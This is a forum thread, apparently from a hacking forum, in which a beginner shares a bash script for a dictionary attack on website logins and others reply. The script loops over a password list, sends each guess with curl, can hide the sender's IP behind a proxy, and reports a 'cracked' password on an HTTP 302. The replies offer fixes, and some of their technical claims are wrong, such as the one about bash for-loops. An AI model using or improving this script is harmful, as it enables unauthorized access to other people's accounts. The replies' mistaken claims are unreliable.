EvilZone

Programming and Scripting => Beginner's Corner => : Red_Tuna August 09, 2015, 01:34:45 AM

: Is this even possible to do?
: Red_Tuna August 09, 2015, 01:34:45 AM

So i was just trying things for fun and editing a bunch of stuff here and there and came up with this "So-Called" Dictionary attack using shell script. Would this even work? Solved my question. Doesnt work. Ill update something new that might.

: (bash)

#!/usr/bin/env bash

echo
echo -n "Enter domain address of website:"
read name

echo -n "Enter username for login:"
read username

echo -n "Would you like to proxy?(Y/N)?"

read proxy

if [ $proxy == 'Y' ]
then
echo -n "Current ip is:"
curl ipecho.net/plain ; echo
echo -n  "Enter ip and port of proxy(EX: 189.11.2.3:8080):"
read proxyip
export http_proxy=http://$proxyip
echo -n "Current ip is:"
curl ipecho.net/plain ; echo

fi

n=`cat john.txt | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p john.txt`
 http_code=$(curl -L --data-urlencode  user="$username" --data-urlencode password="$password" "$name" -w '%{http_code}' -o /dev/null -s)
echo "Trying password: '$password'"
    if [[ $http_code -eq 302 ]]; then
      echo "Password is cracked: '$password'"
      break 2
    fi
  done


Credit goes to some people's scripts i used to make some of this. 75% is mine. Give me your worst (https://evilzone.org/Smileys/default/cheesy.gif) i'm a noob.

Staff note: Next time, use the code tags if your going to post code.

: Re: Is this even possible to do?
: _BEARDYMAN_ October 30, 2015, 03:06:05 PM

Presume it failed mainly at the loop - not a programmer, but I can see the logic is flawed. Think you'd be better loading the dict into an array and pushing on from there. At least you can loop through the words in the dict then.
So fix the loop first, then worry about sending the data.

: Re: Is this even possible to do?
: BurnTheWicked November 01, 2015, 04:57:10 AM

Well, I don't use shell scripts for anything outside of a collect of shell commands. But, to start, using curl, to set the proxy, is not a good idea; it is better, to proxy through the routing, layer 2 if memory serves me right. Look at ifconfig, ip, iptables, and ebtables (all commands). Curl is okay to use for web applications, but outside of that, you would be better off using distinct protocols, such as telnet, ssh, mysql, ect..

Second, I don't recall "do" being used with "for" loops; that is for "do-while" loops. Also your curl command has it directing the output to "/dev/null" aka the blackhole. So even if it did work, you wouldn't know.

I would suggest to learn C/C++/Obj-C; also http://ss64.com/bash/   great place to catch a quick reference to commands, also the "man" command is always useful, same with " --help".